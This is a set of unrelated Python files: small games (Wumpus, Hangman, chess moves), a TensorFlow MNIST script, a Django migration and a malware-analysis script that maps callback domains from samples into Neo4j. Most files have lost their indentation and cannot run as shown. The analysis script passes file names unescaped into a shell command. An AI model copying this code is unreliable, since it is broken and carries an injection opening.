world_name = "Wumpus" + str(random.randint(0,10000))
print "\n*********************************\n"
print "Initializing your own Wumpus world!"
print "Your new world is called: "+ world_name
if not os.path.exists("WumpusWorldDataFolder"):
os.makedirs("WumpusWorldDataFolder")
world=build_world(gold,wumpus,pits)
world["location"] = "Cell 11"
world["orientation"] = "Right"
world["status"] = "living"
world["points"] = 0
world["arrows"] = 1
world["rocks"] = 5
print "You are starting in Cell 11, looking to the Right."
print "You are starting with 0 points, " + str(world["arrows"]) + " arrow(s)."
print "You have " + str(world["rocks"]) + " rocks."
print "You are alive."
with open("WumpusWorldDataFolder/"+world_name+".json", 'w') as worldfile:
json.dump(world, worldfile)
worldfile.close()
return world_name
# At the beginning of each turn, we load the last state of the world so we know
# what precepts to return in response the actions.
def get_world(world_name):
with open("WumpusWorldDataFolder/"+world_name+".json") as worldfile:
world = json.load(worldfile)
worldfile.close()
return world
# As things change in response to actions, we update and store the world in response to
# actions that have been taken
def store_world(world_name,world):
with open("WumpusWorldDataFolder/"+world_name+".json", 'w') as worldfile:
json.dump(world, worldfile)
worldfile.close()
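
# A minimal usage sketch (hypothetical sequence of moves): initialize a world,
# then take a few actions and collect the returned percept vectors. Only the
# functions defined above are used; the vector layout is the one described in
# the header comments.
def example_run():
    token = intialize_world()
    percepts = []
    percepts.append(take_action(token, "Step"))   # step one cell to the Right
    percepts.append(take_action(token, "Up"))     # turn to face Up
    percepts.append(take_action(token, "Step"))   # step one cell Up
    return percepts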
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
Created based on the following tutorial: http://ataspinar.com/2017/08/15/building-convolutional-neural-networks-with-tensorflow/
"""
#%% IMPORT NECESSARY PACKAGES
# To load the MNIST dataset you will need to install 'python-mnist'
# Install it with 'pip install python-mnist'
#pip install python-mnist
#pip install utils
import sys
sys.path.insert(0,'..')
import numpy as np
import tensorflow as tf
import mnist
#from cnn_models.lenet5 import *
#from cnn_models.lenet5_like import *
#from cnn_models.alexnet import *
#from cnn_models.vggnet16 import *
from utils import *
#import load_data as ld
from collections import defaultdict
from tensorflow.examples.tutorials.mnist import input_data
mndata = input_data.read_data_sets("MNIST data", one_hot=True)
#%% TEST CODE TO ENSURE TF IS WORKING AS INTENDED
hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))
graph = tf.Graph()
with graph.as_default():
a = tf.Variable(8, tf.float32)
b = tf.Variable(tf.zeros([2,2], tf.float32))
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
print(session.run(a))
print(session.run(b))
#%% LOAD DATA
mnist_folder = 'C:/Users/nadolsw/Desktop/Tech/Data Science/Python/Ahmet/MNIST/'
mnist_image_size = 28
mnist_image_depth = 1
mnist_num_labels = 10
#mndata = MNIST(mnist_folder)
mnist_train_dataset_, mnist_train_labels_ = mndata.load_training()
mnist_test_dataset_, mnist_test_labels_ = mndata.load_testing()
mnist_train_dataset, mnist_train_labels = reformat_data(mnist_train_dataset_, mnist_train_labels_, mnist_image_size, mnist_image_size, mnist_image_depth)
mnist_test_dataset, mnist_test_labels = reformat_data(mnist_test_dataset_, mnist_test_labels_, mnist_image_size, mnist_image_size, mnist_image_depth)
print("There are {} images, each of size {}".format(len(mnist_train_dataset), len(mnist_train_dataset[0])))
print("Meaning each image has the size of 28*28*1 = {}".format(mnist_image_size*mnist_image_size*1))
print("The training set contains the following {} labels: {}".format(len(np.unique(mnist_train_labels_)), np.unique(mnist_train_labels_)))
print('Training set shape', mnist_train_dataset.shape, mnist_train_labels.shape)
print('Test set shape', mnist_test_dataset.shape, mnist_test_labels.shape)
train_dataset_mnist, train_labels_mnist = mnist_train_dataset, mnist_train_labels
test_dataset_mnist, test_labels_mnist = mnist_test_dataset, mnist_test_labels
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 6 13:07:33 2021
@author: Vidhi
"""
import random
from string import ascii_uppercase
from tkinter import messagebox
from tkinter import*
root = Tk()
root.title("Hangman")
root.iconbitmap("icon.ico")
root.geometry("670x580+300+70")
root.resizable(0,0)
root.config(bg="white")
def StartIsPressed():
def FruitIsPressed():
LLevel.destroy()
Fruit.destroy()
Sport.destroy()
Movie.destroy()
Countries.destroy()
Animal.destroy()
Brands.destroy()
Application.destroy()
word_list = ("APPLE", "AVOCADO", "BANANA", "BLACKBERRIES","MANGO", "APRICOT", "CANTALOUPE",
"ORANGE", "WATERMELON", "CARAMBOLA", "CUSTARDAPPLE", "POMEGRANATE","GUAVA",
"PEAR", "PLUM", "JACKFRUIT", "KIWI", "LYCHEE", "OLIVES", "PAPAYA", "RASPBERRIES", "PINEAPPLE")
photos = [PhotoImage(file="hang0.png"), PhotoImage(file="hang1.png"), PhotoImage(file="hang2.png"), PhotoImage(file="hang3.png"), PhotoImage(file="hang4.png"), PhotoImage(file="hang5.png"), PhotoImage(file="hang6.png"),
PhotoImage(file="hang7.png"), PhotoImage(file="hang8.png"), PhotoImage(file="hang9.png"), PhotoImage(file="hang10.png"), PhotoImage(file="hang11.png")]
def newGame():
global the_word_withSpaces
global numberOfGuesses
numberOfGuesses=0
imgLabel.config(image=photos[0])
the_word=random.choice(word_list)
the_word_withSpaces=" ".join(the_word)
lblWord.set(" ".join("_"*len(the_word)))
def guess(letter):
global numberOfGuesses
global guessed_letters
if numberOfGuesses<11:
txt=list(the_word_withSpaces)
guessed=list(lblWord.get())
print(guessed)
guessed_letters = []
for i in guessed:
if i.isalpha():
guessed_letters.append(i)
print(guessed_letters)
if the_word_withSpaces.count(letter)>0:
for c in range(len(txt)):
if txt[c]==letter:
guessed[c]=letter
lblWord.set("".join(guessed))
if lblWord.get()==the_word_withSpaces:
if numberOfGuesses <= 3:
messagebox.showinfo("Hangman","Your score is 3")
elif numberOfGuesses >3 and numberOfGuesses <=6:
messagebox.showinfo("Hangman","Your score is 2")
elif numberOfGuesses >6 and numberOfGuesses <=9:
messagebox.showinfo("Hangman","Your score is 1")
else:
messagebox.showinfo("Hangman","Your score is 0")
else:
numberOfGuesses+=1
imgLabel.config(image=photos[numberOfGuesses])
guessed=list(lblWord.get())
show_letter = random.choice(list(set(the_word_withSpaces).difference(guessed_letters)))
# show_letter = random.choice(list(the_word_withSpaces))
print(show_letter)
messagebox.showinfo("Hangman","Hint - One of the letter is %s " %(show_letter))
if numberOfGuesses==11:
messagebox.showwarning("Hangman","Game Over")
imgLabel=Label(root)
imgLabel.grid(row=0, column=0, columnspan=3)
imgLabel.config(image=photos[0])
lblWord=StringVar()
Label(root, textvariable=lblWord, font=("Times New Roman", 24, "bold")).grid(row=0, column=3, columnspan=6)
n=0
for c in ascii_uppercase:
Alphabet=Button(root, text=c, command=lambda c=c: guess(c), font=("Californian", 18, "bold"), width=4, justify="center")
Alphabet.grid(row=1+n//9, column=n%9)
n+=1
NewGame = Button(root, text="New\n Game", font=("Californian FB", 10, "bold"), command=lambda:newGame())
NewGame.grid(row=3, column=8, sticky="NSWE")
newGame()
def ApplicationIsPressed():
LLevel.destroy()
Fruit.destroy()
Sport.destroy()
Movie.destroy()
Countries.destroy()
Animal.destroy()
Brands.destroy()
Application.destroy()
word_list = ("FACEBOOK", "INSTAGRAM", "SNAPCHAT", "FLIPKART", "AMAZON", "FREE FIRE",
"MYNTRA", "WHATSAPP", "ZOOM", "YOUTUBE", "UBER")
app_hints = {
'FACEBOOK': 'Maximum fake account',
'INSTAGRAM': 'known as a step brother of Facebook',
'SNAPCHAT': 'ghost logo',
'FLIPKART': 'fashion sale',
'AMAZON': 'the name related to the world largest river',
'FREE FIRE': 'battle royale game',
'MYNTRA' : 'Indian fashion eCommerce company',
'WHATSAPP' : 'commonly used by everyone',
'ZOOM' : 'hated by student during pandemic',
'YOUTUBE' : 'online video platform owned by Google',
'UBER' : 'transport application'
}
photos = [PhotoImage(file="hang0.png"), PhotoImage(file="hang1.png"), PhotoImage(file="hang2.png"), PhotoImage(file="hang3.png"), PhotoImage(file="hang4.png"), PhotoImage(file="hang5.png"), PhotoImage(file="hang6.png"),
PhotoImage(file="hang7.png"), PhotoImage(file="hang8.png"), PhotoImage(file="hang9.png"), PhotoImage(file="hang10.png"), PhotoImage(file="hang11.png")]
def newGame():
global the_word_withSpaces
global numberOfGuesses
numberOfGuesses=0
imgLabel.config(image=photos[0])
the_word=random.choice(word_list)
the_word_withSpaces=" ".join(the_word)
lblWord.set(" ".join("_"*len(the_word)))
def guess(letter):
global numberOfGuesses
global guessed_letters
if numberOfGuesses<11:
txt=list(the_word_withSpaces)
print(txt)
guessed=list(lblWord.get())
print(guessed)
guessed_letters = []
for i in guessed:
if i.isalpha():
guessed_letters.append(i)
print(guessed_letters)
if the_word_withSpaces.count(letter)>0:
for c in range(len(txt)):
if txt[c]==letter:
guessed[c]=letter
lblWord.set("".join(guessed))
if lblWord.get()==the_word_withSpaces:
if numberOfGuesses <= 3:
messagebox.showinfo("Hangman","Your score is 3")
elif numberOfGuesses >3 and numberOfGuesses <=6:
messagebox.showinfo("Hangman","Your score is 2")
elif numberOfGuesses >6 and numberOfGuesses <=9:
messagebox.showinfo("Hangman","Your score is 1")
else:
messagebox.showinfo("Hangman","Your score is 0")
else:
numberOfGuesses+=1
imgLabel.config(image=photos[numberOfGuesses])
# txt = list(the_word_withSpaces)
# print(txt)
# print(the_word_withSpaces)
# print(type(the_word_withSpaces))
# print(txt)
# print(type(txt))
new_word = the_word_withSpaces.replace(" ", "")
print(new_word)
show_letter = app_hints[new_word]
# guessed=list(lblWord.get())
# show_letter = random.choice(list(set(the_word_withSpaces).difference(guessed_letters)))
# show_letter = random.choice(list(the_word_withSpaces))
print(show_letter)
messagebox.showinfo("Hangman","Hint - %s" %(show_letter))
if numberOfGuesses==11:
messagebox.showwarning("Hangman","Game Over")
imgLabel=Label(root)
imgLabel.grid(row=0, column=0, columnspan=3)
imgLabel.config(image=photos[0])
lblWord=StringVar()
Label(root, textvariable=lblWord, font=("Times New Roman", 24, "bold")).grid(row=0, column=3, columnspan=6)
n=0
for c in ascii_uppercase:
Alphabet=Button(root, text=c, command=lambda c=c: guess(c), font=("Californian", 18, "bold"), width=4, justify="center")
Alphabet.grid(row=1+n//9, column=n%9)
n+=1
NewGame = Button(root, text="New\n Game", font=("Californian FB", 10, "bold"), command=lambda:newGame())
NewGame.grid(row=3, column=8, sticky="NSWE")
newGame()
heading.destroy()
LPhoto.destroy()
StartButton.destroy()
LLevel = Label(root, text="Select Categories!!", font=("Californian FB", 35, "bold"), bg="white")
LLevel.place(x=158, y=45)
Fruit = Button(root, text="Fruit", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=70, pady=5, justify="center", cursor="hand2", command=FruitIsPressed)
Fruit.place(x=240, y=120)
Sport = Button(root, text="Sport", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=68, pady=5, justify="center", cursor="hand2",)#command=SportIsPressed
Sport.place(x=240, y=180)
Movie = Button(root, text="Movie", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=66, pady=5, justify="center", cursor="hand2",)#command=MovieIsPressed
Movie.place(x=240, y=240)
Countries = Button(root, text="Countries", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=52, pady=5, justify="center", cursor="hand2",)#command=CountriesIsPressed
Countries.place(x=240, y=300)
Animal = Button(root, text="Animal", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=66, pady=5, justify="center", cursor="hand2",)#command=AnimalIsPressed
Animal.place(x=240, y=360)
Brands = Button(root, text="Brands", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=67, pady=5, justify="center", cursor="hand2",)#command=BrandsIsPressed
Brands.place(x=240, y=420)
Application = Button(root, text="Application", font=("Californian FB", 15, "bold"), bg="blue", fg="white", padx=49, pady=5, justify="center", cursor="hand2", command= ApplicationIsPressed)#command=ApplicationIsPressed
Application.place(x=240, y=480)
heading = Label(root, text="Welcome to Hangman!!", font=("Times New Roman", 40, "bold"), fg="white", bg="black", relief=GROOVE, border=10)
heading.pack(side=TOP, fill=X)
photo = PhotoImage(file="hangman1.png")
LPhoto = Label(root, image=photo, bg="white")
LPhoto.pack()
start = PhotoImage(file="start.png")
StartButton = Button(root, image=start, relief=FLAT, border=0, bg="white", cursor="hand2", command=StartIsPressed)
StartButton.place(x=250, y=490)
root.mainloop()
|
def getPawnMoves(pos, board, colour, moveNo):
possibleMoves = []
standard = [-1,0]
ifOccupied = [[-1,-1], [-1,1]]
ifFirst = [-2,0]
if colour == "black":
standard[0] *= -1
ifOccupied[0][0] *= -1
ifOccupied[1][0] *= -1
ifFirst[0] *= -1
if pos[0] + standard[0] <= 7:
if board[pos[0] + standard[0]][pos[1]] == None:
possibleMoves.append([pos[0] + standard[0], pos[1]])
for move in ifOccupied:
proposedMove = [pos[0] + move[0], pos[1] + move[1]]
if proposedMove[0] <= 7 and proposedMove[0] >= 0 and proposedMove[1] <= 7 and proposedMove[1] >= 0:
if board[proposedMove[0]][proposedMove[1]] != None:
if board[proposedMove[0]][proposedMove[1]].colour != colour:
possibleMoves.append(proposedMove)
if moveNo == 0:
possibleMoves.append([pos[0] + ifFirst[0], pos[1] + ifFirst[1]])
return possibleMoves
def getRookMoves(pos, board, colour):
possibleMoves = []
superSearching = True
searching1 = True
searching2 = True
searching3 = True
searching4 = True
count = 1
while superSearching:
if not searching1 and not searching2 and not searching3 and not searching4:
superSearching = False
else:
if searching1:
if pos[0] - count < 0:
searching1 = False
else:
if board[pos[0] - count][pos[1]] == None:
possibleMoves.append([pos[0] - count, pos[1]])
else:
if board[pos[0] - count][pos[1]].colour != colour:
possibleMoves.append([pos[0] - count, pos[1]])
searching1 = False
if searching2:
if pos[1] + count > 7:
searching2 = False
else:
if board[pos[0]][pos[1] + count] == None:
possibleMoves.append([pos[0], pos[1] + count])
else:
if board[pos[0]][pos[1] + count].colour != colour:
possibleMoves.append([pos[0], pos[1] + count])
searching2 = False
if searching3:
if pos[0] + count > 7:
searching3 = False
else:
if board[pos[0] + count][pos[1]] == None:
possibleMoves.append([pos[0] + count, pos[1]])
else:
if board[pos[0] + count][pos[1]].colour != colour:
possibleMoves.append([pos[0] + count, pos[1]])
searching3 = False
if searching4:
if pos[1] - count < 0:
searching4 = False
else:
if board[pos[0]][pos[1] - count] == None:
possibleMoves.append([pos[0], pos[1] - count])
else:
if board[pos[0]][pos[1] - count].colour != colour:
possibleMoves.append([pos[0], pos[1] - count])
searching4 = False
count += 1
return possibleMoves
def getBishopMoves(pos, board, colour):
possibleMoves = []
superSearching = True
searching1 = True
searching2 = True
searching3 = True
searching4 = True
count = 1
while superSearching:
if not searching1 and not searching2 and not searching3 and not searching4:
superSearching = False
else:
if searching1:
if pos[0] - count < 0 or pos[1] - count < 0:
searching1 = False
else:
if board[pos[0] - count][pos[1] - count] == None:
possibleMoves.append([pos[0] - count, pos[1] - count])
else:
if board[pos[0] - count][pos[1] - count].colour != colour:
possibleMoves.append([pos[0] - count, pos[1] - count])
searching1 = False
if searching2:
if pos[0] - count < 0 or pos[1] + count > 7:
searching2 = False
else:
if board[pos[0] - count][pos[1] + count] == None:
possibleMoves.append([pos[0] - count, pos[1] + count])
else:
if board[pos[0] - count][pos[1] + count].colour != colour:
possibleMoves.append([pos[0] - count, pos[1] + count])
searching2 = False
if searching3:
if pos[0] + count > 7 or pos[1] + count > 7:
searching3 = False
else:
if board[pos[0] + count][pos[1] + count] == None:
possibleMoves.append([pos[0] + count, pos[1] + count])
else:
if board[pos[0] + count][pos[1] + count].colour != colour:
possibleMoves.append([pos[0] + count, pos[1] + count])
searching3 = False
if searching4:
if pos[0] + count > 7 or pos[1] - count < 0:
searching4 = False
else:
if board[pos[0] + count][pos[1] - count] == None:
possibleMoves.append([pos[0] + count, pos[1] - count])
else:
if board[pos[0] + count][pos[1] - count].colour != colour:
possibleMoves.append([pos[0] + count, pos[1] - count])
searching4 = False
count += 1
return possibleMoves
def getKnightMoves(pos, board, colour):
possibleMoves = []
allRelativeMoves = [[-2,1], [-1,2], [1,2], [2,1], [2,-1], [1, -2], [-1, -2], [-2, -1]]
for relativeMove in allRelativeMoves:
newProposedPos = [pos[0] + relativeMove[0], pos[1] + relativeMove[1]]
if not(newProposedPos[0] < 0 or newProposedPos[0] > 7 or newProposedPos[1] < 0 or newProposedPos[1] > 7):
if board[newProposedPos[0]][newProposedPos[1]] == None:
possibleMoves.append(newProposedPos)
else:
if board[newProposedPos[0]][newProposedPos[1]].colour != colour:
possibleMoves.append(newProposedPos)
return possibleMoves
def getKingMoves(pos, board, colour, moveNo):
possibleMoves = []
allRelativeMoves = [[-1,0], [-1,1], [0,1], [1,1], [1,0], [1,-1], [0,-1], [-1,-1]]
if moveNo == 0:
allRelativeMoves.append([0,-2])
for relativeMove in allRelativeMoves:
newProposedPos = [pos[0] + relativeMove[0], pos[1] + relativeMove[1]]
if not(newProposedPos[0] < 0 or newProposedPos[0] > 7 or newProposedPos[1] < 0 or newProposedPos[1] > 7):
if board[newProposedPos[0]][newProposedPos[1]] == None:
possibleMoves.append(newProposedPos)
else:
if board[newProposedPos[0]][newProposedPos[1]].colour != colour:
possibleMoves.append(newProposedPos)
allRelativeMoves = [[-1,0], [-1,1], [0,1], [1,1], [1,0], [1,-1], [0,-1], [-1,-1]]
return possibleMoves
def checkAllMoves(board, colour):
allMoves = []
for line in board:
for piece in line:
if piece != None:
if piece.colour != colour:
if piece.getName()[1] == "k":
pieceMoves = getKingMoves(piece.pos, board, piece.colour, piece.moveNo)
else:
pieceMoves = piece.getMoves(board)
if len(pieceMoves) != 0:
for move in pieceMoves:
allMoves.append(move)
return allMoves
def removeKingTake(board, colour, moves):
position = []
for rank in board:
for piece in rank:
if piece != None:
if piece.getName()[1] == "k":
if piece.colour != colour:
position = piece.pos
if position in moves:
moves.remove(position)
return moves
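
# A small usage sketch (hypothetical board): the move generators above only need
# an 8x8 board whose cells are either None or piece-like objects with a `colour`
# attribute, so an empty board is enough to list moves from a given square.
if __name__ == "__main__":
    empty_board = [[None for _ in range(8)] for _ in range(8)]
    print(getKnightMoves([4, 4], empty_board, "white"))      # 8 knight moves from the centre
    print(len(getRookMoves([0, 0], empty_board, "white")))   # 14 rook moves from a corner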
|
matrix = [[1, 5, 9], [-2, 0, 13], [7, 1, 5]]
# for i in range(3):
# if i == 0:
# sm_1 = min(m[i])
# elif i == 1:
# sm_2 = min(m[i])
# else:
# sm_3 = min(m[i])
# print(min(sm_1, sm_2, sm_3))
# ##########################
"""
temp_list =[]
m = None
n = None
for row in matrix:
temp_min = min(row)
temp_list.append(temp_min)
m = temp_list.index(temp_min)
temp_min = min(temp_list)
n = temp_list.index(temp_min)
print(f"m*n: {m},{n} | smalest number is- {temp_min}")
"""
smallest = None
m, n = None, None
for m_ind, m_list in enumerate(matrix):
print("H" ,m_ind, m_list)
for n_ind, n_val in enumerate(m_list):
if smallest == None:
smallest = n_val
m, n = m_ind, n_ind
elif smallest > n_val:
smallest = n_val
m, n = m_ind, n_ind
print(smallest, m, n)
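
# An equivalent one-liner sketch: min() over (value, row, col) tuples picks the
# smallest value first, carrying its indices along (ties fall back to indices).
smallest, m, n = min((val, i, j) for i, row in enumerate(matrix) for j, val in enumerate(row))
print(smallest, m, n)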
|
# The following program extracts callback domain names from malware files and then builds a bipartite network of malware samples and callback domains in Neo4j.
# One projection of that network shows which malware samples share common callback servers;
# the other projection shows which callback servers are contacted by common malware samples.
#!/usr/bin/python
import pefile
import sys
import argparse
import os
import pprint
#import networkx
import re
#from networkx.drawing.nx_agraph import write_dot
import collections
#from networkx.algorithms import bipartite
from neo4j import GraphDatabase
driver = GraphDatabase.driver("bolt://localhost:7687",auth=(os.environ['neouser'],os.environ['neopassword']))
args = argparse.ArgumentParser("Visualize shared hostnames between a directory of malware samples")
args.add_argument("target_path",help="directory with malware samples")
# args.add_argument("output_file",help="file to write DOT file to")
# args.add_argument("malware_projection",help="file to write DOT file to")
# args.add_argument("hostname_projection",help="file to write DOT file to")
args = args.parse_args()
# network = networkx.Graph()
valid_hostname_suffixes = map(lambda string: string.strip(), open("/home/president_techknights/project/malware_data_science/ch4/code/domain_suffixes.txt"))
valid_hostname_suffixes = set(valid_hostname_suffixes)
def find_hostnames(string):
possible_hostnames = re.findall(r'(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6}', string)
    valid_hostnames = list(filter(lambda hostname: hostname.split(".")[-1].lower() in valid_hostname_suffixes, possible_hostnames))
return valid_hostnames
def create_nodem(n):
with driver.session() as session:
# session.run("CREATE (n:{0})".format(name) + " /{ label: $label /}", label=label)
session.run("MERGE (a:malware {name: $n , type: 'malware'}) ", n=n )
# maybe we can edit property and add type as malware
# ("MERGE (a:Person {name: $name}) "
# "MERGE (a)-[:KNOWS]->(friend:Person {name: $friend_name})",
# name=name, friend_name=friend_name)
def create_nodeh(n):
with driver.session() as session:
# session.run("CREATE (n:{0})".format(name) + " /{ label: $label /}", label=label)
session.run("MERGE (b:host {name: $n , type: 'host'})", n=n )
def create_edge(node1,node2):
with driver.session() as session:
# session.run("CREATE (n.`{0}`)<-[:HOST]-(n.`{1}`)".format(node1,node2) )
session.run("MATCH (a), (b) WHERE a.name = $node1 AND b.name = $node2 "
"CREATE (a)<-[:HOST]-(b)", node1=node1, node2=node2 )
# search the target directory for valid Windows PE executable files
for root,dirs,files in os.walk(args.target_path):
for path in files:
# try opening the file with pefile to see if it's really a PE file
try:
pe = pefile.PE(os.path.join(root,path))
except pefile.PEFormatError:
continue
fullpath = os.path.join(root,path)
# extract printable strings from the target sample
strings = os.popen("strings '{0}'".format(fullpath)).read()
# use the search_doc function in the included reg module to find hostnames
hostnames = find_hostnames(strings)
# print(hostnames)
# if len(hostnames):
# # add the nodes and edges for the bipartite network
# # network.add_node(path,label=path[:32],color='black',penwidth=5,bipartite=0)
# # malware nodes
# # CREATE (n:path {name: path[:32]})
path=path.replace('-','_')
create_nodem(path[:32])
for hostname in hostnames:
# print(hostname)
# # network.add_node(hostname,label=hostname,color='blue', penwidth=10,bipartite=1)
# # hostname nodes
# # CREATE (n:hostname {name: hostname})
hostname=hostname.replace('.','_')
hostname=hostname.replace('-','_')
hostname= '_'+hostname
create_nodeh(hostname)
# # network.add_edge(hostname,path,penwidth=2)
# # relationship between hostname and malware
# # CREATE (n:path)<-[:HOST]-(n:hostname)
# try:
create_edge(path[:32], hostname)
#except:
# print("couldn't create edge {} - {}".format(path[:32],hostname))
if hostnames:
print ("Extracted hostnames from:",path)
# pprint.pprint(hostnames)
# write the dot file to disk
# write_dot(network, args.output_file)
# malware = set(n for n,d in network.nodes(data=True) if d['bipartite']==0)
# hostname = set(network)-malware
# # use NetworkX's bipartite network projection function to produce the malware
# # and hostname projections
# malware_network = bipartite.projected_graph(network, malware)
# hostname_network = bipartite.projected_graph(network, hostname)
# # write the projected networks to disk as specified by the user
# write_dot(malware_network,args.malware_projection)
# write_dot(hostname_network,args.hostname_projection)
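
# A hedged sketch of the malware-side projection done directly in Cypher instead
# of NetworkX: two malware nodes are linked in the projection when they share at
# least one callback host. It reuses the `driver` and the HOST relationships
# created above; the query itself is an illustrative assumption, not part of the
# original script.
def shared_host_pairs():
    with driver.session() as session:
        result = session.run(
            "MATCH (m1:malware)<-[:HOST]-(h:host)-[:HOST]->(m2:malware) "
            "WHERE m1.name < m2.name "
            "RETURN m1.name AS a, m2.name AS b, count(h) AS shared_hosts"
        )
        return [(record["a"], record["b"], record["shared_hosts"]) for record in result]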
|
# Generated by Django 3.2.3 on 2021-06-02 13:57
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
("images", "0008_auto_20210602_1557"),
]
operations = [
migrations.CreateModel(
name="ExpiringUrl",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("uuid", models.UUIDField(default=uuid.uuid4)),
("created_at", models.DateTimeField()),
("expires_at", models.DateTimeField()),
(
"image",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="images.image"
),
),
],
),
]
|
import module2
owner = 'module1'
module2.show_owner(owner)
|